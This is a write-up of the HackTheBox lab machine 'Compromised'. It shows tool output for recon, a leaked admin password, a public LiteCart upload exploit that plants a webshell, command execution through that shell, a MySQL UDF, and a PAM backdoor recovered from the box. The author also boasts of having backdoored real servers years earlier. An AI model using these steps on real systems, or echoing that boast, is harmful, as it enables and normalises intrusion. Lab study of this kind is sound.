image-20200918234403355

The whole machine is built around the "compromised" theme, which is why root first blood landed before user first blood; there is an unintended path (?).

recon:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-16 08:45 EDT
Nmap scan report for compromised.htb (10.129.12.43)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.94 seconds

Another machine with a web entry point. The usual directory scan:

$ gobuster dir -u http://compromised.htb/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 30
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://compromised.htb/
[+] Threads: 30
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/18 11:50:11 Starting gobuster
===============================================================
/shop (Status: 301)
/backup (Status: 301)
Progress: 66340 / 207644 (31.95%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/09/18 11:50:32 Finished
===============================================================

/shop is a LiteCart 2.1.2 site. A quick search turns up a known vulnerability, but it requires an authenticated admin, so look at the backup directory first:

$ curl compromised.htb/backup/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /backup</title>
</head>
<body>
<h1>Index of /backup</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[ ]"></td><td><a href="a.tar.gz">a.tar.gz</a></td><td align="right">2020-09-03 11:51 </td><td align="right">4.4M</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at compromised.htb Port 80</address>
</body></html>

a.tar.gz is the site source. After extracting it and searching, I found no backdoor, but admin/login.php contains a commented-out line (compromised theme callback count: 1):

//file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
# root @ kali in ~/hackthebox/machines/compromised/shop/admin [11:55:13] 
$ curl http://compromised.htb/shop/admin/.log2301c9430d8593ae.txt
User: admin Passwd: theNextGenSt0r3!~

Once logged in, the public exploit gives a shell. I tweaked the exploit slightly so it uploads a one-line webshell that AntSword (蚁剑) can connect to.

$ searchsploit litecart
------------------------------------------------------------------------------------------ ------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------ ------------------------------
LiteCart 2.1.2 - Arbitrary File Upload | php/webapps/45267.py
------------------------------------------------------------------------------------------ ------------------------------
Shellcodes: No Results
# root @ kali in ~/hackthebox/machines/compromised [11:58:18] C:130
$ python2 exp.py -t http://compromised.htb/shop/admin/ -u admin -p theNextGenSt0r3\!~
http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php
Shell => http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php?c=id

# root @ kali in ~/hackthebox/machines/compromised [11:58:24]
$ curl -I http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php
HTTP/1.1 200 OK
Date: Fri, 18 Sep 2020 15:58:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8

# root @ kali in ~/hackthebox/machines/compromised [11:58:56] C:2
$ curl http://compromised.htb/shop/admin/../vqmod/xml/3ROX9.php -d "pass=echo 'asdfasdf';"
asdfasdf

This step was probably meant to require bypassing PHP disable_functions, but in practice it wasn't necessary. Linking it anyway: https://www.exploit-db.com/exploits/48072

After connecting with AntSword and digging around, I eventually found a UDF left behind by other attackers in the mysql.func table of the MySQL database (compromised theme callback count: 2):

image-20200919000432861

image-20200919000535291

This exec_cmd only returns the last line of the command's output. Appending |base64 -w 0 to the command yields a single base64 line, which can then be decoded locally with base64 -d. The returned length is still capped, so use head and tail to slice out lines N through M of the output.

The normal route here would be to write an SSH public key into .ssh/authorized_keys under the mysql home directory and SSH in for a proper shell, but even that isn't strictly required:

image-20200919001915931

This password also works for another account, sysadmin:

$ ssh sysadmin@compromised.htb
sysadmin@compromised.htb's password:
Last login: Fri Sep 18 16:20:20 2020 from 10.10.14.41
sysadmin@compromised:~$ whoami
sysadmin
sysadmin@compromised:~$ wc -c user.txt
33 user.txt

But you can actually go straight from mysql to root:

Check the creation date of the file that logged the admin credentials earlier:

image-20200919003157382

List the files created after May 29 (compromised theme callback count: 3):

image-20200919003319304
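The "files newer than a reference file" sweep above is what `find / -newer <file> -type f` does; as an added example (not from the original post), here is the same hunt in Python, with the noisy directories pruned and a constructed temp tree to show it working. It compares mtime, since Linux stat() exposes no true creation time.

```python
import os
import tempfile

# Trees that churn constantly and bury real findings (constructed default
# list; tune it per host).
NOISY_DIRS = ("/proc", "/sys", "/dev", "/run", "/var/cache", "/var/log")


def files_modified_after(root, reference_path, skip_dirs=NOISY_DIRS):
    """Return sorted paths under `root` whose mtime is newer than that of
    `reference_path`, like `find root -newer reference_path -type f`.
    mtime can be reset by an attacker (touch -r), so treat the result as a
    starting point for review, not as proof."""
    ref_mtime = os.stat(reference_path).st_mtime
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune noisy trees in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in skip_dirs]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip it
            if st.st_mtime > ref_mtime:
                hits.append(path)
    return sorted(hits)


def demo():
    """Constructed tree: a reference file, one older file, one newer file
    and one newer file inside a pruned directory. Returns (hits, new_path)."""
    base = tempfile.mkdtemp()
    ref = os.path.join(base, "ref.txt")
    old = os.path.join(base, "old.bin")
    new = os.path.join(base, "lib", "pam_suspect.so")
    noisy = os.path.join(base, "cache", "junk")
    os.makedirs(os.path.dirname(new))
    os.makedirs(os.path.dirname(noisy))
    for path in (ref, old, new, noisy):
        open(path, "w").close()
    t0 = 1_600_000_000  # arbitrary epoch time for the reference file
    os.utime(ref, (t0, t0))
    os.utime(old, (t0 - 86400, t0 - 86400))
    os.utime(new, (t0 + 3600, t0 + 3600))
    os.utime(noisy, (t0 + 3600, t0 + 3600))
    pruned = (os.path.join(base, "cache"),)
    return files_modified_after(base, ref, skip_dirs=pruned), new


if __name__ == "__main__":
    print(demo()[0])
```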

This brings back memories of planting OpenSSH backdoors on all kinds of servers around 2014-2015; break back in two years later and you could still find .ilog/.olog files under /var/log with fresh credentials in them.

Bragging aside, back to the point: pull this PAM backdoor back to the local box and disassemble it, and it is immediately obvious:

image-20200919005055066

A very obvious backdoor: convert the hex immediates to ASCII and concatenate them, minding endianness. Because OpenSSH here does not have PAM authentication enabled, this password cannot be used to log in over SSH, but after logging in as mysql you can su to root with it:

$ ssh -i key mysql@compromised.htb
Last login: Thu Sep 3 11:52:44 2020 from 10.10.14.2
mysql@compromised:~$ su
Password:
root@compromised:/var/lib/mysql# wc -c /root/root.txt
33 /root/root.txt
root@compromised:/var/lib/mysql# hostname
compromised
root@compromised:/var/lib/mysql#
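The hex-to-ASCII step used on the PAM backdoor above (a hard-coded string stored onto the stack as little-endian immediates) is mechanical enough to script. This is an added example, not code from the post; the objdump-style Intel-syntax listing and the string it hides are constructed, not the real backdoor's values.

```python
import re

# Width in bytes of each store, keyed by the x86 size keyword.
WIDTHS = {"BYTE": 1, "WORD": 2, "DWORD": 4, "QWORD": 8}

STORE_RE = re.compile(
    r"mov\s+(?P<size>BYTE|WORD|DWORD|QWORD) PTR \[rbp-(?P<off>0x[0-9a-f]+)\],(?P<src>\S+)")
MOVABS_RE = re.compile(r"movabs\s+(?P<reg>\w+),(?P<imm>0x[0-9a-f]+)")


def recover_stack_string(disasm):
    """Rebuild a string the compiler wrote onto the stack as immediate
    stores. Each immediate is little-endian, so 0x723030646b636142 is the
    bytes 42 61 63 6b 64 30 30 72 ("Backd00r"). Pieces are ordered by stack
    offset rather than by line order. Returns the bytes up to the first NUL."""
    regs = {}  # register -> 64-bit immediate loaded by movabs
    buf = {}   # stack offset relative to rbp -> little-endian bytes
    for line in disasm.splitlines():
        m = MOVABS_RE.search(line)
        if m:
            regs[m["reg"]] = int(m["imm"], 16)
            continue
        m = STORE_RE.search(line)
        if not m:
            continue
        width = WIDTHS[m["size"]]
        src = m["src"]
        value = int(src, 16) if src.startswith("0x") else regs[src]
        buf[-int(m["off"], 16)] = value.to_bytes(width, "little")
    raw = b"".join(buf[off] for off in sorted(buf))
    return raw.split(b"\0", 1)[0]


# Constructed listing: a 12-byte string stored as one qword via rax, one
# dword immediate, and a terminating NUL byte.
SAMPLE_DISASM = """\
  401136: 48 b8 42 61 63 6b 64 30 30 72   movabs rax,0x723030646b636142
  401140: 48 89 45 e0                     mov    QWORD PTR [rbp-0x20],rax
  401144: c7 45 e8 5f 50 77 21            mov    DWORD PTR [rbp-0x18],0x2177505f
  40114b: c6 45 ec 00                     mov    BYTE PTR [rbp-0x14],0x0
"""

if __name__ == "__main__":
    print(recover_stack_string(SAMPLE_DISASM))  # b'Backd00r_Pw!'
```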